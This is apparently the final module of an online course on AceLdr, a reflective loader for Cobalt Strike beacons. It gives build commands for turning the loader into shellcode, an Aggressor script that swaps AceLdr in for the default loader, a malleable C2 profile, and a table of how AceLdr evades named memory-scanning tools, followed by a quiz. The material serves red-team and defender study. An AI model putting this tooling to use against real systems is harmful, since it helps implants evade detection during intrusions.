Module 9: Full Chain & Cobalt Strike Integration

From Makefile to malleable C2 — shipping AceLdr as a production RDLL

Advanced

Build Pipeline

AceLdr's build system uses a Makefile that chains three tools: NASM (assembler), GCC (cross-compiler targeting x86-64 Windows), and a custom extract.py script:

Build Pipeline

*.asm files
spoof.asm, etc.
NASM
Assemble to .o
*.c files
ace.c, util.c, hooks/
x86_64-w64-mingw32-gcc
Compile & link
ace.exe
(raw PE)
extract.py
Extract .text
ace.bin
(PIC shellcode)
Makefile
# Assemble the return-address spoofing stub
nasm -f win64 spoof.asm -o spoof.o

# Compile and link everything as position-independent code
x86_64-w64-mingw32-gcc \
    -nostdlib -fPIC -Os \
    -ffunction-sections -fdata-sections \
    -Wl,--no-seh,--image-base=0,-s,--gc-sections \
    -o ace.exe \
    ace.c util.c hooks/*.c spoof.o

# Extract the .text section as raw shellcode
python3 extract.py ace.exe ace.bin

Compiler Flags Explained

FlagPurpose
-nostdlib Do not link against the C standard library. AceLdr resolves all APIs at runtime via PEB walking and API hashing — no CRT dependency.
-fPIC Generate position-independent code. All references use RIP-relative addressing, so the code works at any load address.
-Os Optimize for size. Smaller shellcode means faster injection and less suspicious memory footprint.
-ffunction-sections Place each function in its own section. Combined with --gc-sections, the linker can discard unused functions.
--no-seh Do not generate Structured Exception Handling tables. SEH data would break PIC and add unnecessary metadata.
--image-base=0 Set the preferred load address to 0. Forces all addresses to be offsets, ensuring true position-independence.
-s Strip all symbols and debug information. Reduces size and removes reverse-engineering hints.

extract.py

The final step uses a Python script to parse the compiled PE and extract just the .text section as raw bytes. This is the actual shellcode (ace.bin) that gets injected into a target process. The PE headers, import table, and other sections are discarded — they were only needed for linking.

Cobalt Strike CNA Script

AceLdr integrates with Cobalt Strike as a Reflective DLL (RDLL) replacement via an Aggressor script (.cna file). The key hook is BEACON_RDLL_GENERATE:

Aggressor Script — aceldr.cna
# Hook into Cobalt Strike's RDLL generation
set BEACON_RDLL_GENERATE {
    # $1 = architecture (x86 or x64)
    # $2 = raw beacon DLL bytes
    # $3 = Cobalt Strike-generated RDLL (default loader)

    # Only support x64
    if ($1 eq "x64") {
        # Read AceLdr shellcode
        $loader = readb(script_resource("ace.bin"));

        # Concatenate: AceLdr shellcode + beacon DLL
        # AceLdr expects the beacon immediately after itself
        # It finds the beacon by looking for the ACELDR marker
        # at a known offset from its own base address
        return $loader . $2;
    }

    # Fall back to default RDLL for x86
    return $3;
}

How Concatenation Works

RDLL Memory Layout

ace.bin
AceLdr PIC shellcode
+
beacon.dll
Raw Cobalt Strike DLL
=
Combined RDLL
Injected into target

The BEACON_RDLL_GENERATE hook replaces Cobalt Strike's default reflective loader with AceLdr. The concatenation ($loader . $2) places the AceLdr shellcode immediately before the raw beacon DLL bytes. When injected, execution starts at AceLdr's entry point, which:

  1. Locates the beacon DLL appended after itself using a known marker
  2. Reflectively loads the beacon into memory
  3. Installs the 6 IAT hooks
  4. Calls the beacon's DllMain to start execution

The ACELDR Marker

AceLdr embeds a marker (a magic byte sequence) at a known offset in its shellcode. After injection, it uses this marker to calculate where its own code ends and where the appended beacon DLL begins. This avoids hardcoding sizes — the same AceLdr binary works with any beacon DLL regardless of its size.

Complete Lifecycle — 4 Phases

AceLdr + Beacon Lifecycle

Phase 1: Injection

Operator sends
beacon payload
Injector writes
AceLdr+beacon
into target
Execution starts
at AceLdr entry

Phase 2: Reflective Load

Find beacon via
ACELDR marker
Map sections
& fix relocations
Resolve imports
via PEB walking
Install 6
IAT hooks
Call beacon
DllMain

Phase 3: Running

Beacon executes
operator commands
Heap on private
heap (invisible)
API calls use
spoofed returns
C2 comms via
InternetConnectA

Phase 4: Sleeping

Beacon calls
Sleep(interval)
FOLIAGE:
encrypt heap
APC chain:
mask code +
spoof context
Sleep
(fully masked)
Wakeup:
decrypt &
restore

Malleable C2 Profile Highlights

For optimal operation with AceLdr, the Cobalt Strike malleable C2 profile should include specific settings:

Key Profile Settings

Malleable C2 Profile
# Use RDLL for reflective loading
stage {
    set userwx        "false";     # Don't use RWX memory
    set stomppe       "true";      # Stomp PE headers after load
    set cleanup       "true";      # Clean up loader artifacts
    set sleep_mask    "false";     # Disable CS sleep mask (AceLdr handles this)
    set smartinject   "true";      # Use smart injection techniques
}

# Process injection settings
process-inject {
    set startrwx "false";          # Don't start with RWX
    set userwx   "false";          # Don't use RWX after injection
}

The critical setting is set sleep_mask "false". Cobalt Strike has its own built-in sleep mask, but AceLdr's FOLIAGE implementation is more comprehensive (it includes heap encryption, context spoofing, and CFG-aware APC chains). Using both simultaneously would conflict.

References & Further Reading

Primary Sources

ResourceDescription
AceLdr Repository The original AceLdr source code — a Cobalt Strike RDLL with position-independent reflective loading, IAT hooking, return address spoofing, and FOLIAGE-based sleep masking
FOLIAGE by SecIdiot The inspiration for AceLdr's sleep masking — demonstrates APC-based sleep encryption with thread context spoofing
TitanLdr Another advanced reflective DLL loader with similar techniques — useful for comparing implementation approaches
Return Address Spoofing Research and proof-of-concept code for spoofing call stack return addresses using ROP-like gadgets

Detection Tools to Study

Understanding detection is as important as understanding evasion. Study these tools to understand what defenders look for:

ToolWhat It DetectsWhat AceLdr Evades
Moneta Unbacked executable memory, suspicious memory permissions FOLIAGE changes permissions to RW during sleep; code is encrypted
PE-sieve Hollowed processes, injected PEs, modified modules AceLdr stomps PE headers and uses a private heap to avoid default heap artifacts
BeaconEye Cobalt Strike beacon configuration blocks in memory Private heap + FOLIAGE encryption masks config data during sleep
Hunt-Sleeping-Beacons Threads sleeping with suspicious return addresses or contexts Return address spoofing + thread context spoofing via FOLIAGE APCs
Patriot Sleeping threads with RIP pointing to non-module memory FOLIAGE APC chain sets RIP to ntdll during sleep

Where to Go From Here

Suggested Next Steps

Final Knowledge Check

Module 9 Quiz

1. How does AceLdr locate the appended beacon DLL in memory after injection?

AceLdr embeds a magic marker (the ACELDR marker) at a known offset in its shellcode. After injection, it locates this marker to calculate where its own code ends and where the concatenated beacon DLL begins. This avoids hardcoding sizes and works with any beacon DLL.

2. In the CNA script, what does the concatenation $loader . $2 produce?

$loader is the AceLdr shellcode (read from ace.bin) and $2 is the raw beacon DLL bytes provided by Cobalt Strike. The dot operator concatenates them, producing a binary blob where AceLdr shellcode comes first (its entry point is at offset 0), immediately followed by the beacon DLL that AceLdr will reflectively load.

3. Which of the following is NOT true about the beacon during a FOLIAGE-masked sleep?

The IAT hooks are never removed during sleep. They are installed once after reflective loading and persist for the entire beacon lifecycle. During FOLIAGE sleep, the beacon's code is encrypted, the heap is encrypted, memory permissions change to RW, and the thread context is spoofed — but the IAT entries themselves remain modified.

4. In the FOLIAGE APC chain, what is the correct ordering of the key operations?

The correct order follows the APC chain: (1) Get context, (2) Spoof context (set RIP to ntdll), (3) Change permissions to RW, (4) Encrypt beacon code, (5) Sleep (the actual wait), (6) Decrypt beacon code, (7) Change permissions back to RX, (8) Restore original context, (9) Signal completion. The operations mirror each other around the sleep in the middle.

Course Complete!

You've completed all 9 modules of the AceLdr Memory Evasion Masterclass.

What You've Learned
  • Windows memory fundamentals and virtual memory
  • PE file format parsing and manipulation
  • PEB walking and API hashing for stealth
  • Reflective DLL loading without LoadLibrary
  • Position-independent code (PIC) development
  • IAT hooking for behavioral control
  • Return address spoofing with ROP gadgets
  • FOLIAGE sleep masking with APC chains
  • Full build pipeline and Cobalt Strike integration
Recommended Next Steps
  • Read AceLdr's full source code end-to-end
  • Build a minimal loader from scratch
  • Study indirect syscalls and ETW bypasses
  • Test with detection tools (Moneta, PE-sieve)
  • Explore hardware breakpoint hooking
  • Read the FOLIAGE and TitanLdr source code
  • Practice analyzing beacons with BeaconEye

Understanding these techniques is essential for both offensive security professionals and defenders building detection capabilities.